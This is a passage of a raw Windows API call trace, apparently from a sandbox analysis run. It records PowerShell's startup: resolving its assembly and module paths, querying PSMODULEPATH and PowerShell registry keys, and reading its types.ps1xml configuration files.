lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.915] GetLastError () returned 0xcb [0074.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.915] GetLastError () returned 0xcb [0074.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.972] GetLastError () returned 0x3 [0074.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.972] GetLastError () returned 0x3 [0074.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.972] GetLastError () returned 0x3 [0074.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.972] GetLastError () returned 0x3 [0074.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.972] GetLastError () returned 0x3 [0074.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.972] GetLastError () returned 0x3 [0074.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.973] GetLastError () returned 0x3 [0074.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.973] GetLastError () returned 0x3 [0074.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.973] GetLastError () returned 0x3 [0074.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.973] GetLastError () returned 0x3 [0074.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.973] GetLastError () returned 0x3 [0074.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xade10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.973] GetLastError () returned 0x3 [0074.976] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0074.976] GetLastError () returned 0x3 [0074.979] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x54b630, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0074.979] GetLastError () returned 0x3 [0074.979] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xae420 | out: phkResult=0xae420*=0x350) returned 0x0 [0074.979] RegQueryValueExW (in: hKey=0x350, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xae464, lpData=0x0, lpcbData=0xae460*=0x0 | out: lpType=0xae464*=0x2, lpData=0x0, lpcbData=0xae460*=0x6c) returned 0x0 [0074.981] RegQueryValueExW (in: hKey=0x350, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xae464, lpData=0x54b630, lpcbData=0xae460*=0x6c | out: lpType=0xae464*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xae460*=0x6c) returned 0x0 [0074.981] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x54b630, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0074.981] GetLastError () returned 0x3 [0074.981] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x54b630, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0074.981] GetLastError () returned 0x3 [0074.981] RegCloseKey (hKey=0x350) returned 0x0 [0074.981] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x54b630, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0074.981] GetLastError () returned 0x3 [0074.982] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xae420 | out: phkResult=0xae420*=0x350) returned 0x0 [0074.982] RegQueryValueExW (in: hKey=0x350, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xae464, lpData=0x0, lpcbData=0xae460*=0x0 | out: lpType=0xae464*=0x0, lpData=0x0, lpcbData=0xae460*=0x0) returned 0x2 [0074.982] RegCloseKey (hKey=0x350) returned 0x0 [0074.997] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x54b630 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0074.999] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xadf88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0074.999] GetLastError () returned 0x3f0 [0075.000] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0075.000] GetLastError () returned 0x3f0 [0075.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.010] GetLastError () returned 0xcb [0075.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.011] GetLastError () returned 0xcb [0075.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.018] GetLastError () returned 0xcb [0075.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.018] GetLastError () returned 0xcb [0075.026] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae3a0 | out: phkResult=0xae3a0*=0x358) returned 0x0 [0075.028] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xae408, lpData=0x0, lpcbData=0xae404*=0x0 | out: lpType=0xae408*=0x1, lpData=0x0, lpcbData=0xae404*=0x74) returned 0x0 [0075.029] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xae3e8, lpData=0x0, lpcbData=0xae3e4*=0x0 | out: lpType=0xae3e8*=0x1, lpData=0x0, lpcbData=0xae3e4*=0x74) returned 0x0 [0075.029] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xae3e8, lpData=0x54b630, lpcbData=0xae3e4*=0x74 | out: lpType=0xae3e8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xae3e4*=0x74) returned 0x0 [0075.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xadf68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0075.030] GetLastError () returned 0xcb [0075.030] SetErrorMode (uMode=0x1) returned 0x1 [0075.030] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xae3e8 | out: lpFileInformation=0xae3e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0075.030] GetLastError () returned 0xcb [0075.030] SetErrorMode (uMode=0x1) returned 0x1 [0075.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xadf5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0075.035] GetLastError () returned 0xcb [0075.035] SetErrorMode (uMode=0x1) returned 0x1 [0075.035] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae3dc | out: lpFileInformation=0xae3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0075.037] GetLastError () returned 0xcb [0075.037] SetErrorMode (uMode=0x1) returned 0x1 [0075.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xadf5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0075.041] GetLastError () returned 0xcb [0075.041] SetErrorMode (uMode=0x1) returned 0x1 [0075.041] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae3dc | out: lpFileInformation=0xae3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0075.042] GetLastError () returned 0xcb [0075.042] SetErrorMode (uMode=0x1) returned 0x1 [0075.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0075.049] GetLastError () returned 0xcb [0075.051] GetACP () returned 0x4e4 [0075.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xaddec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0075.062] GetLastError () returned 0xcb [0075.062] SetErrorMode (uMode=0x1) returned 0x1 [0075.064] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x35c [0075.064] GetLastError () returned 0x0 [0075.065] GetFileType (hFile=0x35c) returned 0x1 [0075.065] SetErrorMode (uMode=0x1) returned 0x1 [0075.065] GetFileType (hFile=0x35c) returned 0x1 [0075.067] ReadFile (in: hFile=0x35c, lpBuffer=0x2b48a44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b48a44*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.072] GetLastError () returned 0x0 [0075.073] ReadFile (in: hFile=0x35c, lpBuffer=0x2b48a44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b48a44*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.073] GetLastError () returned 0x0 [0075.073] ReadFile (in: hFile=0x35c, lpBuffer=0x2b48a44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b48a44*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.073] GetLastError () returned 0x0 [0075.074] ReadFile (in: hFile=0x35c, lpBuffer=0x2b48a44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b48a44*, lpNumberOfBytesRead=0xae354*=0xcf3, lpOverlapped=0x0) returned 1 [0075.074] GetLastError () returned 0x0 [0075.074] ReadFile (in: hFile=0x35c, lpBuffer=0x2b47ed7, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b47ed7*, lpNumberOfBytesRead=0xae354*=0x0, lpOverlapped=0x0) returned 1 [0075.074] GetLastError () returned 0x0 [0075.074] ReadFile (in: hFile=0x35c, lpBuffer=0x2b48a44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b48a44*, lpNumberOfBytesRead=0xae354*=0x0, lpOverlapped=0x0) returned 1 [0075.074] GetLastError () returned 0x0 [0075.075] CloseHandle (hObject=0x35c) returned 1 [0075.075] GetLastError () returned 0x0 [0075.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xadeb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0075.077] GetLastError () returned 0x0 [0075.077] SetErrorMode (uMode=0x1) returned 0x1 [0075.077] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2b59db8 | out: lpFileInformation=0x2b59db8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0075.077] GetLastError () returned 0x0 [0075.077] SetErrorMode (uMode=0x1) returned 0x1 [0075.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0075.079] GetLastError () returned 0x0 [0075.079] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae2d8 | out: phkResult=0xae2d8*=0x35c) returned 0x0 [0075.079] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae320, lpData=0x0, lpcbData=0xae31c*=0x0 | out: lpType=0xae320*=0x1, lpData=0x0, lpcbData=0xae31c*=0x56) returned 0x0 [0075.079] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae320, lpData=0x54b630, lpcbData=0xae31c*=0x56 | out: lpType=0xae320*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae31c*=0x56) returned 0x0 [0075.080] RegCloseKey (hKey=0x35c) returned 0x0 [0075.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0075.080] GetLastError () returned 0x0 [0075.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xade14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0075.080] GetLastError () returned 0x0 [0075.152] GetSystemInfo (in: lpSystemInfo=0xada58 | out: lpSystemInfo=0xada58*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0075.154] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0075.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xaddec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0075.181] GetLastError () returned 0x0 [0075.181] SetErrorMode (uMode=0x1) returned 0x1 [0075.181] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x35c [0075.181] GetLastError () returned 0x0 [0075.181] GetFileType (hFile=0x35c) returned 0x1 [0075.181] SetErrorMode (uMode=0x1) returned 0x1 [0075.181] GetFileType (hFile=0x35c) returned 0x1 [0075.181] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.183] GetLastError () returned 0x0 [0075.183] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.184] GetLastError () returned 0x0 [0075.185] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.185] GetLastError () returned 0x0 [0075.185] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.185] GetLastError () returned 0x0 [0075.185] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.185] GetLastError () returned 0x0 [0075.186] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.186] GetLastError () returned 0x0 [0075.186] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.186] GetLastError () returned 0x0 [0075.186] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.186] GetLastError () returned 0x0 [0075.186] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.186] GetLastError () returned 0x0 [0075.187] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.187] GetLastError () returned 0x0 [0075.188] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.188] GetLastError () returned 0x0 [0075.188] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.188] GetLastError () returned 0x0 [0075.188] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.188] GetLastError () returned 0x0 [0075.188] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.188] GetLastError () returned 0x0 [0075.188] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.188] GetLastError () returned 0x0 [0075.189] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.189] GetLastError () returned 0x0 [0075.189] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, 